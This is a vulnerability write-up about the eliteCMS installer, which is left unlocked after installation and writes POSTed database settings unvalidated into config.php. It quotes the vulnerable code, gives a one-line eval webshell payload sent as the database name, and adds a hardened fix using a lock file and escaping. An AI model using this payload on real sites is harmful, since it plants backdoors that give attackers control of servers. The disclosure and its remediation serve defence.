eliteCMS: installer not locked after installation + one-line webshell write vulnerability

Source: 自学PHP网    Date: 2015-04-17 12:00

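The eliteCMS installer is not locked once installation has finished, so an attacker can run the installation again simply by requesting the installer URL.
A second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code: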
 
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";
 
    $writer = fopen($file, 'w');
...
 
Now look at this code:
 
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
 
The values are taken from the request without any validation.
If the database name is POSTed with the following data:
 
"?><?php eval($_POST[c]);?><?php
 
a one-line backdoor is written into /admin/includes/config.php.
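
One way to close both issues described above, as an added example that is not eliteCMS code: the step 4 handler refuses to run once a lock file exists, validates each setting, and emits the values with var_export() so they cannot break out of the string literal. The lock file name, the validation patterns and the function names are assumptions, and only the define() lines of config.php are generated here.

```php
<?php
// Added example: hardened replacement for the installer's step 4.
// INSTALL_LOCK and the validation patterns are assumptions, not eliteCMS code.
const INSTALL_LOCK = __DIR__ . '/../admin/includes/install.lock';
const CONFIG_FILE  = __DIR__ . '/../admin/includes/config.php';

// Accept only characters that are plausible for each setting.
function valid_setting(string $key, string $value): bool
{
    $patterns = [
        'DB_SERVER' => '/\A[A-Za-z0-9.\-:]{1,255}\z/',
        'DB_NAME'   => '/\A[A-Za-z0-9_]{1,64}\z/',
        'DB_USER'   => '/\A[A-Za-z0-9_]{1,32}\z/',
        'DB_PASS'   => '/\A[^\x00-\x1F\x7F]{0,128}\z/',
    ];
    return isset($patterns[$key]) && preg_match($patterns[$key], $value) === 1;
}

// Build the define() lines; var_export() emits each value as an escaped PHP
// string literal, so quotes or a PHP closing tag inside a value stay data.
function render_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        if (!isset($settings[$key]) || !is_string($settings[$key]) || !valid_setting($key, $settings[$key])) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($settings[$key], true) . ");\n";
    }
    return $out;
}

function install_step4(array $post): void
{
    // Refuse to run once an installation has completed.
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installer is locked.');
    }
    $config = render_config($post);
    if (file_put_contents(CONFIG_FILE, $config, LOCK_EX) === false) {
        throw new RuntimeException('Cannot write config file');
    }
    // Create the lock; fopen mode "x" fails if the file already exists.
    $lock = fopen(INSTALL_LOCK, 'x');
    if ($lock === false) { throw new RuntimeException('Cannot create lock file'); }
    fclose($lock);
}
```

Calling install_step4($_POST) in place of the original step 4 branch rejects the database-name payload shown above at validation, and any later request to the installer gets a 403.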
 
 
